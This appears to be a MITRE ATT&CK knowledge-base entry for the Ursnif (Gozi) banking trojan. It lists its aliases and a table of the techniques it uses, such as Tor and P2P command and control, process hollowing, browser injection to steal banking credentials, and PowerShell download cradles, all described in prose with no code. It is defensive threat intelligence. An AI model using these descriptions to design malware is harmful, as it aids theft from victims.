Register to stream ATT&CKcon 2.0 October 29-30

Ursnif

Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]

ID: S0386
Associated Software: Gozi-ISFB, PE_URSNIF, Dreambot
Type: MALWARE
Platforms: Windows
Version: 1.0

Associated Software Descriptions

Name Description
Gozi-ISFB [7][2]
PE_URSNIF [3]
Dreambot [1][2]

Techniques Used

Domain ID Name Use
Enterprise T1090 Connection Proxy Ursnif has used a peer-to-peer (P2P) network for C2. [1] [2]
Enterprise T1094 Custom Command and Control Protocol Ursnif has used a custom packet format over TCP and UDP for a peer-to-peer (P2P) network for C2. [2]
Enterprise T1132 Data Encoding Ursnif has used encoded data in HTTP URLs for C2. [2]
Enterprise T1005 Data from Local System Ursnif has collected files from victim machines, including certificates and cookies. [4]
Enterprise T1074 Data Staged Ursnif has used tmp files to stage gathered information. [3]
Enterprise T1140 Deobfuscate/Decode Files or Information Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk. [2]
Enterprise T1175 Distributed Component Object Model Ursnif droppers have used COM objects to execute the malware's full executable payload. [8]
Enterprise T1483 Domain Generation Algorithms Ursnif has used a DGA to generate domain names for C2. [2]
Enterprise T1106 Execution through API Ursnif has used CreateProcessW to create child processes. [7]
Enterprise T1107 File Deletion Ursnif has deleted data staged in tmp files after exfiltration. [3]
Enterprise T1179 Hooking Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers. [3]
Enterprise T1185 Man in the Browser Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords). [4]
Enterprise T1036 Masquerading Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names. [3]
Enterprise T1112 Modify Registry Ursnif has used Registry modifications as part of its installation routine. [4] [2]
Enterprise T1188 Multi-hop Proxy Ursnif has used Tor for C2. [1] [2]
Enterprise T1050 New Service Ursnif has registered itself as a system service in the Registry for automatic execution at system startup. [6]
Enterprise T1027 Obfuscated Files or Information Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands. [2] [8]
Enterprise T1086 PowerShell Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload. [8]
Enterprise T1057 Process Discovery Ursnif has gathered information about running processes. [3] [4]
Enterprise T1093 Process Hollowing Ursnif has used process hollowing to inject into child processes. [7]
Enterprise T1055 Process Injection Ursnif has injected code into target processes via thread local storage callbacks. [3] [6] [7]
Enterprise T1012 Query Registry Ursnif has used Reg to query the Registry for installed programs. [3] [4]
Enterprise T1060 Registry Run Keys / Startup Folder Ursnif has used Registry Run keys to establish automatic execution at system startup. [6] [4]
Enterprise T1105 Remote File Copy Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads. [6] [4]
Enterprise T1091 Replication Through Removable Media Ursnif has copied itself to and infected removable drives for propagation. [3] [5]
Enterprise T1113 Screen Capture Ursnif has used hooked APIs to take screenshots. [3] [4]
Enterprise T1064 Scripting Ursnif droppers have used VBA macros and PowerShell to download and execute the malware's full executable payload. [8]
Enterprise T1071 Standard Application Layer Protocol Ursnif has used HTTPS for C2 as well as HTTP POSTs to exfil gathered information. [3] [7] [2]
Enterprise T1082 System Information Discovery Ursnif has used Systeminfo to gather system information. [3]
Enterprise T1007 System Service Discovery Ursnif has gathered information about running services. [3]
Enterprise T1080 Taint Shared Content Ursnif has copied itself to and infected files in network drives for propagation. [3] [5]
Enterprise T1497 Virtualization/Sandbox Evasion Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools. [5]
Enterprise T1047 Windows Management Instrumentation Ursnif droppers have used WMI classes to execute PowerShell commands. [8]

References